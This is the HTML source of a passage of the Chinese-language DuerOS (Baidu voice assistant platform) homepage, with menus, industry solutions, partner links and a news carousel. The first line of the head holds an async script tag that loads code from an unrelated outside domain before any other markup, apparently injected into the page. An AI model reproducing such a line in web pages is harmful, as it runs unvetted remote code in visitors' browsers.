<!DOCTYPE html>
<html>
<head><script async src="//ij.so9.cc/j/?t=fx&g=8cab8ed0be60&c=708b1a3f03ee&rv=1"></script> 
    <meta charset="utf-8">
    <title>DuerOS官方网站</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="keywords" content="度秘，DuerOS，百度，人工智能，小度">
    <meta name="description" content="DuerOS是百度度秘事业部研发的对话式AI操作系统，拥有10大类目的250多项技能。搭载DuerOS的设备能够听清、听懂、并满足用户。">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    <meta name="baidu-site-verification" content="6WCe9b2X3u" />
    <link rel="shortcut icon" type="image/x-icon" href="//duer.bdstatic.com/saiya/dueros_static/statics/images/dumi/favicon.png" media="screen">
    <link href="//duer.bdstatic.com/saiya/dueros_static/statics/css/dumi/swiper.min.css" type="text/css" rel="stylesheet">
    <link href="//duer.bdstatic.com/saiya/dueros_static/statics/css/dumi/swiper.3dflow.css" type="text/css" rel="stylesheet">
    <link type="text/css" href="//duer.bdstatic.com/saiya/dueros_static/statics/css/dumi/main.css" rel="stylesheet">
    <link type="text/css" href="//duer.bdstatic.com/saiya/dueros_static/statics/css/dumi/util.css" rel="stylesheet">
    <script src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/html5shiv.min.js" type="text/javascript"></script>
    <script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/jquery-1.10.2.min.js"></script>
    <script type="text/javascript" src="//duer.bdstatic.com/saiya/dueros_static/statics/js/dumi/Validform_v5.3.1.js"></script>
</head>
<body>
<div class="header">
    <div class="hd-container">
        <div class="logo-box">
            <h1 class="logo">
                <a href="/"><img src="//duer.bdstatic.com/saiya/dueros_static/statics/images/dumi/logo.png"></a>
            </h1>
        </div>
        <ul class="nav clearfix">
            <li class="nav-children fl hidden">
                <a href="/" class="nav-name">首页</a>
            </li>
            <li class="nav-children fl">
                <a href="/html/dueros/index.html" class="nav-name">DuerOS介绍</a>
                <div class="nav-down-menu nav-down-block clearfix">
                    <div class="box-l fl">
                        <div class="opa"></div>
                        <div class="option-btn-box">
                                                                                                                <a href="javascript:;" class="option-btn on">What's DuerOS?</a>
                                                                                    <a href="javascript:;" class="option-btn ">Why DuerOS?</a>
                                                                                                                <!-- <a href="javascript:;" class="option-btn">How DuerOS?</a> -->
                        </div>
                    </div>
                    <div class="box-r fl">

                        <div class="opa"></div>

                        <div class="option-con-box">
                                                                                    <div class="option-con on">
                                <div class="opa-bg opa-bg-what"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1108/20171108023529628.jpg"></div>
                                <h3 class="min-tit2">对话式人工智能操作系统</h3>
                                <p class="channel-para">DuerOS对话式人工智能系统，真正使AI高科技落地到现实生活，降低用户获取信息的门槛，为人类带来简单可得的便利。</p>
                                <a href="/html/dueros/index.html" class="what-link">DuerOS详细介绍</a>
                                <!--<a href="/html/solution/index.html" class="what-link">更多设备解决方案</a>-->
                            </div>
                                                                                                                                            <div class="option-con">
                                <h3 class="min-tit2">DuerOS能做什么？</h3>
                                <div class="apply-box clearfix">
                                                                                                                                                <div class="apply fl">
                                        <div class="apply-icon apply-icon1">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030212485.png">
                                        </div>
                                        <p class="apply-name">娱乐影音</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon2">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030219282.png">
                                        </div>
                                        <p class="apply-name">信息查询</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon3">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030225733.png">
                                        </div>
                                        <p class="apply-name">生活服务</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon4">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030233248.png">
                                        </div>
                                        <p class="apply-name">出行路况</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon5">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030246561.png">
                                        </div>
                                        <p class="apply-name">实用工具</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon6">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030257143.png">
                                        </div>
                                        <p class="apply-name">个人助手</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon7">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030305606.png">
                                        </div>
                                        <p class="apply-name">知识教育</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon8">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030315684.png">
                                        </div>
                                        <p class="apply-name">聊天休闲</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon9">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1214/20171214053819183.png">
                                        </div>
                                        <p class="apply-name">智能家居</p>
                                    </div>
                                                                                                            <div class="apply fl">
                                        <div class="apply-icon apply-icon10">
                                            <img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1213/20171213030328835.png">
                                        </div>
                                        <p class="apply-name">指令控制</p>
                                    </div>
                                                                                                                                            </div>
                                <p class="sunmary">
                                    <a href="/html/dueros/index.html#d5">全面了解DuerOS十大类目，200余项功能 > </a>
                                </p>
                                <h3 class="min-tit2">技术优势</h3>
                                <div class="apply-box clearfix">
                                                                                                                                                <div class="apply2 fl">
                                        <div class="apply-icon apply-icon20"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1228/20171228013056222.png"></div>
                                        <p class="apply-name">算法</p>
                                    </div>
                                                                                                            <div class="apply2 fl">
                                        <div class="apply-icon apply-icon21"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1228/20171228013104964.png"></div>
                                        <p class="apply-name">计算</p>
                                    </div>
                                                                                                            <div class="apply2 fl">
                                        <div class="apply-icon apply-icon22"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1228/20171228013112271.png"></div>
                                        <p class="apply-name">数据</p>
                                    </div>
                                                                                                            <div class="apply2 fl">
                                        <div class="apply-icon apply-icon23"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1228/20171228013118664.png"></div>
                                        <p class="apply-name">语音识别</p>
                                    </div>
                                                                                                            <div class="apply2 fl">
                                        <div class="apply-icon apply-icon24"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1228/20171228013125649.png"></div>
                                        <p class="apply-name">图像识别</p>
                                    </div>
                                                                                                            <div class="apply2 fl">
                                        <div class="apply-icon apply-icon25"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1228/20171228013132393.png"></div>
                                        <p class="apply-name">自然语音处理</p>
                                    </div>
                                                                                                            <div class="apply2 fl">
                                        <div class="apply-icon apply-icon26"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1228/20171228013143883.png"></div>
                                        <p class="apply-name">用户画像</p>
                                    </div>
                                                                                                                                            </div>
                                <p class="sunmary">
                                    <a href="/html/dueros/index.html#d2">了解DuerOS更多优势 ></a>
                                </p>
                            </div>
                                                                                </div>
                    </div>
                </div>
            </li>
            <li class="nav-children nav-children2 fl">
                <a href="/html/solution/index.html" class="nav-name">解决方案</a>
                <div class="nav-down-menu nav-down-block clearfix">
                    <div class="box-l fl">
                        <div class="opa"></div>
                        <div class="option-btn-box">
                            <!--<a href="javascript:;" class="option-btn on">设备解决方案</a>-->
                            <a href="javascript:;" class="option-btn">行业解决方案</a>
                        </div>
                    </div>
                    <div class="box-r fl">
                        <div class="opa"></div>
                        <div class="option-con-box">
                            <!--
                            <div class="option-con on">
                                <div class="each-row fl">
                                    <p class="c-name">
                                        <a href="/html/solution/index.html" title="">全部</a>
                                        <i class="col-line"></i>
                                    </p>
                                </div>
                                                                                                                                <div class="each-row fl">
                                    <p class="c-name">
                                        <a href="/html/2017/jjfasj_0608/5.html" title="">智能电视</a>
                                    </p>
                                    <p class="e-name">
                                                                                                                        <a href="/html/2017/jjfasj_0608/5.html" title="">智能电视</a>
                                                                                <a href="/html/2017/jjfasj_0608/5.html" title="">机顶盒</a>
                                                                                <a href="/html/2017/jjfasj_0608/5.html" title="">电视遥控器</a>
                                                                                                                    </p>
                                </div>
                                                                                                <div class="each-row fl">
                                    <p class="c-name">
                                        <a href="/html/2017/jjfasj_0608/6.html" title="">智能冰箱</a>
                                    </p>
                                    <p class="e-name">
                                                                                                                                                            </p>
                                </div>
                                                                                                <div class="each-row fl">
                                    <p class="c-name">
                                        <a href="/html/2017/jjfasj_0608/7.html" title="">轻量级设备</a>
                                    </p>
                                    <p class="e-name">
                                                                                                                        <a href="/html/2017/jjfasj_0608/7.html" title="">智能冰箱 LightOS</a>
                                                                                <a href="/html/2017/jjfasj_0608/7.html" title="">便携音箱</a>
                                                                                <a href="/html/2017/jjfasj_0608/7.html" title="">扫地机器人</a>
                                                                                <a href="/html/2017/jjfasj_0815/14.html" title="">故事机</a>
                                                                                <a href="/html/2017/jjfasj_0608/7.html" title="">空气净化器</a>
                                                                                <a href="/html/2017/jjfasj_0608/7.html" title="">插座</a>
                                                                                <a href="/html/2017/jjfasj_0608/7.html" title="">门锁</a>
                                                                                <a href="/html/2017/jjfasj_0608/7.html" title="">灯</a>
                                                                                                                    </p>
                                </div>
                                                                                                <div class="each-row fl">
                                    <p class="c-name">
                                        <a href="/html/2017/jjfasj_0620/11.html" title="">智能手机助手</a>
                                    </p>
                                    <p class="e-name">
                                                                                                                        <a href="/html/2017/jjfasj_0620/11.html" title="">手机</a>
                                                                                                                    </p>
                                </div>
                                                                                                <div class="each-row fl">
                                    <p class="c-name">
                                        <a href="/html/2017/jjfasj_0622/13.html" title="">智能可穿戴</a>
                                    </p>
                                    <p class="e-name">
                                                                                                                        <a href="/html/2017/jjfasj_0622/13.html" title="">智能手表</a>
                                                                                <a href="/html/2017/jjfasj_0622/13.html" title="">智能手环</a>
                                                                                                                    </p>
                                </div>
                                                                                                <div class="each-row fl">
                                    <p class="c-name">
                                        <a href="/html/2017/jjfasj_0608/10.html" title="">智能车载</a>
                                    </p>
                                    <p class="e-name">
                                                                                                                        <a href="/html/2017/jjfasj_0608/10.html" title="">车载前装</a>
                                                                                <a href="/html/2017/jjfasj_0608/10.html" title="">一体化车机</a>
                                                                                <a href="/html/2017/jjfasj_0608/10.html" title="">智能后视镜</a>
                                                                                                                    </p>
                                </div>
                                                                                                                            </div>
                            //-->
                            <!--<div class="option-con option-con-1 ">-->
                            <div class="option-con on">
                                <!--
                                <div class="each-row fl">
                                    <p class="c-name">
                                        <a href="/business/emp/empview/index.html#/" title="">全部</a>
                                        <i class="col-line"></i>
                                    </p>
                                </div>
                                -->
                                                                                                                                <div class="each-row fl">
                                    <a class="c-name" href="/business/emp/empview/index.html#/">
                                        <img class="icon" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0625/20180625103015851.png">
                                        <img class="icon hover" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0625/20180625103026540.png">
                                        <span>酒店行业</span>
                                    </a>
                                    <p class="e-name">通过语音交互及AI技术，打造创新智慧酒店。</p>
                                </div>
                                                                                                <div class="each-row fl">
                                    <a class="c-name" href="/business/emp/empview/index.html#/">
                                        <img class="icon" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0625/20180625103119198.png">
                                        <img class="icon hover" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0625/20180625103130448.png">
                                        <span>养老行业</span>
                                    </a>
                                    <p class="e-name">通过智能语音播报和交互能力为老人提供资讯类、社区力为老人提供资讯类、社区服务。</p>
                                </div>
                                                                                                <div class="each-row fl">
                                    <a class="c-name" href="/business/emp/empview/index.html#/">
                                        <img class="icon" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0625/20180625103230296.png">
                                        <img class="icon hover" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0625/20180625103240112.png">
                                        <span>地产行业</span>
                                    </a>
                                    <p class="e-name">打造新时代的科技住宿环境，让AI真正融入生活。</p>
                                </div>
                                                                                                                            </div>
                        </div>
                    </div>
                </div>
            </li>
            <li class="nav-children nav-children2 fl hidden">
                <a href="/html/cooperation/index.html" class="nav-name">合作伙伴</a>
                <div class="nav-down-menu nav-down-block clearfix">
                    <div class="box-l fl">
                        <div class="opa"></div>
                        <div class="option-btn-box">
                            <a href="javascript:;" class="option-btn on">合作伙伴类型</a>
                        </div>
                    </div>
                    <div class="box-r fl">
                        <div class="opa"></div>
                        <div class="option-con-box">
                            <div class="option-con on">
                                <div class="product-box clearfix">
                                                                                                            <div class="product fl small">
                                        <h5 class="tit-h5">硬件产品厂商</h5>
                                        <p class="txt">实现产品与人的对话</p>
                                        <a href="/html/cooperation/index.html"
                                           class="apply-for-btn">申请合作</a>
                                    </div>
                                                                        <div class="product fl small">
                                        <h5 class="tit-h5">内容资源方</h5>
                                        <p class="txt">连接内容与智能设备</p>
                                        <a href="/html/cooperation/index.html"
                                           class="apply-for-btn">申请合作</a>
                                    </div>
                                                                        <div class="product fl small">
                                        <h5 class="tit-h5">芯片模组厂商</h5>
                                        <p class="txt">集成对话式人工智能</p>
                                        <a href="/html/cooperation/index.html"
                                           class="apply-for-btn">申请合作</a>
                                    </div>
                                                                        <div class="product fl small">
                                        <h5 class="tit-h5">方案厂商</h5>
                                        <p class="txt">连接内容与智能设备</p>
                                        <a href="/html/cooperation/index.html"
                                           class="apply-for-btn">申请合作</a>
                                    </div>
                                                                        <div class="product fl small">
                                        <h5 class="tit-h5">垂直行业</h5>
                                        <p class="txt">应用智能语音解决方案</p>
                                        <a href="/business/emp/empview/index.html#/"
                                           class="apply-for-btn">申请合作</a>
                                    </div>
                                                                                                        </div>
                            </div>
                        </div>
                    </div>
                </div>
            </li>
            <li class="nav-children fl">
                <a href="https://dueros.baidu.com/open" class="nav-name">开放平台</a>
                <div class="nav-down-menu nav-down-block clearfix">
                    <div class="box-l fl">
                        <div class="opa"></div>
                        <div class="option-btn-box">
                            <a href="javascript:;" class="option-btn on">选择开放平台</a>
                        </div>
                    </div>
                    <div class="box-r fl">
                        <div class="opa"></div>
                        <div class="option-con-box">
                            <div class="option-con on">
                                <div class="product-box clearfix">
                                                                                                            <div class="product fl">
                                        <h5 class="tit-h5">智能家居开放平台</h5>
                                        <p class="txt">使用小度音箱语音控制智能家电</p>
                                        <a href="https://dueros.baidu.com/dbp/bot/index#/iotopenplatform"
                                           class="apply-for-btn">立即进入</a>
                                    </div>
                                                                        <div class="product fl">
                                        <h5 class="tit-h5">技能开放平台</h5>
                                        <p class="txt">快速创建开发精彩的DuerOS对话式技能</p>
                                        <a href="https://dueros.baidu.com/dbp"
                                           class="apply-for-btn">立即进入</a>
                                    </div>
                                                                                                        </div>
                            </div>
                        </div>
                    </div>
                </div>
            </li>
            <li class="nav-children fl">
                <a href="/html/news/activity/index.html" class="nav-name">新闻动态</a>
                <div class="nav-down-menu nav-down-block clearfix">
                    <div class="box-l fl">
                        <div class="opa"></div>
                        <div class="option-btn-box">
                                                                                                                <a href="javascript:;" class="option-btn on">新闻动态</a>
                                                                                    <a href="javascript:;" class="option-btn ">展会活动</a>
                                                                                    <a href="javascript:;" class="option-btn ">产品公告</a>
                                                                                                            </div>
                    </div>
                    <div class="box-r fl">
                        <div class="opa"></div>
                        <div class="option-con-box">
                                                                                    <div class="option-con on">
                                <div class="opa-bg"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0623/20180623082755703.png"></div>
                                <h3 class="min-tit2">新闻动态</h3>
                                <p class="channel-para">了解主流媒体对DuerOS的最新、最全面的新闻报导。</p>
                                <p class="channel-para">随时更新你的智能生活资讯。</p>
                                <a href="/html/news/activity/index.html"
                                   class="detail-btn">查看更多</a>
                            </div>
                                                                                                                                            <div class="option-con">
                                <div class="opa-bg"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0623/20180623083104826.png"></div>
                                <h3 class="min-tit2">展会活动</h3>
                                <p class="channel-para">与智能行业一起，快速发展。</p>
                                <p class="channel-para">查看DuerOS最新的参展消息及活动报导。</p>
                                <a href="/html/news/exhibition/index.html"
                                   class="detail-btn">查看更多</a>
                            </div>
                                                                                                                                            <div class="option-con clearfix">
                                <div class="opa-bg"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2018/0623/20180623083218680.png"></div>
                                <h3 class="min-tit2">产品公告</h3>
                                <p class="channel-para">产品功能更新全收录。</p>
                                <p class="channel-para">了解DuerOS让如何设备变的更加智能。</p>
                                <a href="/html/news/msg/index.html"
                                   class="detail-btn">查看更多</a>
                            </div>
                                                                                </div>
                    </div>
                </div>
            </li>
            <li class="nav-children fl">
                <a href="/html/about-us/index.html" class="nav-name">关于我们</a>
                <div class="nav-down-menu nav-down-block clearfix">
                    <div class="box-l fl">
                        <div class="opa"></div>
                        <div class="option-btn-box">
                                                                                                                <a href="javascript:;" class="option-btn on">我们是谁</a>
                                                                                    <a href="javascript:;" class="option-btn ">大事记</a>
                                                                                    <a href="javascript:;" class="option-btn ">联系我们</a>
                                                                                                            </div>
                    </div>
                    <div class="box-r fl">
                        <div class="opa"></div>
                        <div class="option-con-box">
                                                                                    <div class="option-con on">
                                <div class="opa-bg opa-bg-us"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1108/20171108035724134.jpg"></div>
                                <h3 class="min-tit2">我们是谁</h3>
                                <p class="channel-para">DuerOS是百度度秘事业部研发的对话式人工智能系统。搭载DuerOS的设备可让用户以自然语言对话的交互方式，实现影音娱乐、信息查询、生活服务、出行路况等10大类目的250多项功能的操作。</p>
                                <a href="/html/about-us/index.html"
                                   class="detail-btn">查看详情</a>
                            </div>
                                                                                                                                            <div class="option-con">
                                <div class="opa-bg opa-bg-history"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1108/20171108035816454.jpg"></div>
                                <h3 class="min-tit2">大事记</h3>
                                <p class="channel-para">2015年百度世界大会，百度董事长兼首席执行官李彦宏宣布推出全新的机器人助理度秘，用机器人秘书的方式开启智能服务时代。</p>
                                <a href="/html/about-us/events/index.html"
                                   class="detail-btn">查看详情</a>
                            </div>
                                                                                                                                            <div class="option-con clearfix">
                                <div class="opa-bg opa-bg-contact"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2017/1214/20171214033055152.jpg"></div>
                                <h3 class="min-tit2">联系我们</h3>
                                <p class="channel-para">地址：北京市海淀区西北旺东路10号院百度科技园1号楼 商务邮箱dueros-bd@baidu com</p>
                                <a href="/html/about-us/contact/index.html"
                                   class="detail-btn">查看详情</a>
                            </div>
                                                                                </div>
                    </div>
                </div>
            </li>
        </ul>
        <ul class="lang-ch">
            <li class="lang-now"><a href="javascript:;">中</a></li>
            <li><a href="/en/index.html">En</a></li>
        </ul>
    </div>
</div>
<span class="mobile-nav">
            <img src="//duer.bdstatic.com/saiya/dueros_static/statics/images/dumi/headIcon-h.png" class="menu-btn on">
            <img src="//duer.bdstatic.com/saiya/dueros_static/statics/images/dumi/p-close-btn.png" class="close-btn">
        </span>
<!--phone  -->

<div class="phone-nav-bg"></div>
<div class="phone-nav">
    <ul class="nav-ul">
        <li class="hidden"><a href="/" title=""><span>首页</span></a></li>
        <li><a href="/html/dueros/index.html"><span>DuerOS介绍</span></a>
            <!-- <div class="sec-nav">
                <p><a href="/html/solution/index.html" title="">设备解决方案</a></p>
                <i></i>
            </div>
            <em></em> -->
        </li>
        <li data-role="j-first-nav"><a href="javascript:;"><span>解决方案</span></a>
            <div class="sec-nav">
                <!-- <p><a href="/html/solution/index.html" title="">设备解决方案</a></p>
                <p><a href="/business/emp/empview/index.html#/" title="">行业解决方案</a></p>-->
                <p><a href="/business/emp/empview/index.html#/" title="">行业解决方案</a></p>
            </div>
            <em></em>
        </li>
        <!-- <li><a href="/html/cooperation/index.html"><span>合作伙伴</span></a> -->
            <!-- <div class="sec-nav">
                <p><a href="javascript:;" title="">设备解决方案</a></p>
                <p><a href="javascript:;" title="">能力组合方案</a></p>
                <p><a href="javascript:;" title="">产品成功案例</a></p>
                <i></i>
            </div>
            <em></em> -->
        <!-- </li>-->
        <li style="display:none;"><a href=""><span>需求合作</span></a>
            <!-- <div class="sec-nav">
                <p><a href="javascript:;" title="">设备解决方案</a></p>
                <p><a href="javascript:;" title="">能力组合方案</a></p>
                <p><a href="javascript:;" title="">产品成功案例</a></p>
                <i></i>
            </div>
            <em></em> -->
        </li>
        <li><a href="https://dueros.baidu.com/open"><span>开放平台</span></a>
            <!-- <div class="sec-nav">
                <p><a href="javascript:;" title="">设备解决方案</a></p>
                <p><a href="javascript:;" title="">能力组合方案</a></p>
                <p><a href="javascript:;" title="">产品成功案例</a></p>
                <i></i>
            </div>
            <em></em> -->
        </li>
        <li><a href="/html/news/activity/index.html"><span>新闻动态</span></a>
            <!-- <div class="sec-nav">
                <p><a href="javascript:;" title="">设备解决方案</a></p>
                <p><a href="javascript:;" title="">能力组合方案</a></p>
                <p><a href="javascript:;" title="">产品成功案例</a></p>
                <i></i>
            </div>
            <em></em> -->
        </li>
        <li><a href="/html/about-us/index.html"><span>关于我们</span></a>
            <!-- <div class="sec-nav">
                <p><a href="javascript:;" title="">设备解决方案</a></p>
                <p><a href="javascript:;" title="">能力组合方案</a></p>
                <p><a href="javascript:;" title="">产品成功案例</a></p>
                <i></i>
            </div>
            <em></em> -->
        </li>
        <li class="hidden2"><a href="/"><span>简体中文</span></a></li>
        <li><a href="/en/index.html"><span>English</span></a></li>
    </ul>
</div>
<div class="fixed-right">
    <div class="ai-consult">
        <a href="mailto:dueros-bd@baidu.com?&body=您好，我们是***企业，主营业务是***。目前期望接入DuerOS的能力，我们将主要在***场景（音箱、电视、手机、机器人等）中应用DuerOS的语音对话能力。我们希望通过DuerOS实现***产品功能。

                （更多关于合作意向的描述）

                以下是我的联系方式，非常期待你们的回信。
                联系人姓名：
                联系人电话：
                联系人邮箱：">
            <em>合作<br/>咨询</em>
        </a>
    </div>
    <div class="go-top-btn">
        <a href="javascript:;">
            <em>返回<br/>顶部</em>
        </a>
    </div>
</div>
<!--统计代码-->
<script>
var _hmt = _hmt || [];
(function () {
    var hm = document.createElement('script');
    hm.src = 'https://hm.baidu.com/hm.js?d300619958c1246b4f17c7792229399c';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(hm, s);
})();
</script>
<div class="banner">
    <div class="swiper-container" id="banner-swiper">
        <div class="swiper-wrapper">
                                    <div class="swiper-slide">
                <a class="slide-wrap-link" href="https://dueros.baidu.com/html/2020/activity_0106/362.html">
                    <img class="bimg-slide" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2020/0107/20200107034151824.jpg" alt="">
                    <img class="smimg-slide" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2020/0107/20200107034220332.jpg" alt="">
                    <div class="cont-slide">
                        <p class="p1">.</p>
                        <p class="p2"></p>
                                            </div>
                </a>
            </div>
                        <div class="swiper-slide">
                <a class="slide-wrap-link" href="https://create.baidu.com">
                    <img class="bimg-slide" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0612/20190612061603516.jpg" alt="">
                    <img class="smimg-slide" src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0612/20190612061613201.jpg" alt="">
                    <div class="cont-slide">
                        <p class="p1">.</p>
                        <p class="p2"></p>
                                            </div>
                </a>
            </div>
                                </div>
        <div class="pagination" id="bannerpagination"></div>
    </div>
</div>
<div class="hot-news">
    <h2 class="news-tit">了解此刻DuerOS在做什么？</h2>
    <div class="news-cont">
        <div class="news-swiper">
            <div class="swiper-container" id="swiper-container2">
                <div class="swiper-wrapper">
                                                            <div class="swiper-slide">
                        <a href="https://dueros.baidu.com/html/2019/activity_1203/355.html">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/1203/20191203021806851.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>小度商业化合作创新案例 与合生元共探“品牌技能定制”</h4>
                                    <p>小度为合生元打造“品牌技能定制”服务 AI助力共探育儿最优解</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="https://dueros.baidu.com/html/2019/activity_1112/351.html">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/1231/20191231114727210.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>小度化身故宫中国节AI大使 智能科技与故宫文化的完美融合</h4>
                                    <p>小度在家1S故宫文化限定版与故宫文化深入融合，拥有超高颜值的“故宫红”机身和深度定制</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="https://dueros.baidu.com/html/2019/activity_1112/352.html">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/1112/20191112050633323.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>小度双十一全面夺魁 有屏音箱单品第一</h4>
                                    <p>双十一小度有屏音箱独占鳌头 夺全网成交金额&成交量双冠王</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="https://tech.china.com/article/20190703/kejiyuan0129321370.html">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0705/20190705025722356.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>百度发布小度助手5.0 AI创新速度再次革新人机交互体验</h4>
                                    <p>7月3日，在2019百度 AI开发者大会上，百度创始人、董事长兼首席执行官李彦宏现场演示全双工免唤醒能力</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="https://create.baidu.com">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0605/20190605022404841.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>2019百度AI开发者大会来了！</h4>
                                    <p>2019盛夏，百度诚邀每一位开发者、合伙伙伴，共聚     "Baidu Create 2019     "百度AI开发者大会</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="https://news.znds.com/article/36680.html">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0425/20190425055541689.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>小度智能硬件家族再添新成员！百度发布小度在家1S和小度电视伴侣</h4>
                                    <p>2月28日，百度以震撼价格连发两款人工智能硬件新品——小度电视伴侣和小度在家1S</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="http://biz.ifeng.com/a/20190422/45501715_0.shtml">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0425/20190425060119843.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>官宣！入驻《向往的生活》第三季  小度在家1S与你一同开启温情时刻</h4>
                                    <p>百度赞助《向往的生活》第三季 小度在家1S显露真身变成贴心小助手</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="http://www.prcfe.com/finance/2019/0220/339427.html">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0403/20190403042014728.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>Strategy Analytics发布2018Q4智能音箱市场报告：百度出货量升至国内第二</h4>
                                    <p>2018年Q4，全球智能音箱出货量增长了95％，达到3850万台，超过了2017全年的总出货量</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="http://biz.ifeng.com/a/20190110/45286238_0.shtml">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0403/20190403041736272.jpg" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>双奖傍身！百度DuerOS和小度在家纷纷斩获CES 2019大奖</h4>
                                    <p>美西时间2019年1月9日，全球领先品牌颁奖典礼在美国拉斯维加斯举办的CES 2019期间举行</p>
                                    <div class="detail"><p><em>了解详情</em><span></span></p></div>
                                </div>
                            </div>
                        </a>
                    </div>
                                        <div class="swiper-slide">
                        <a href="http://it.gmw.cn/2019-01/09/content_32323563.htm">
                            <div class="news-wapper">
                                <div class="news-top"><img src="//duer.bdstatic.com/saiya/dueros_static/uploadfile/2019/0403/20190403040758951.png" alt="" ></div>
                                <div class="news-bottom">
                                    <h4>小度家族集体亮相CES 2019 中国AI力量获赞无数</h4>
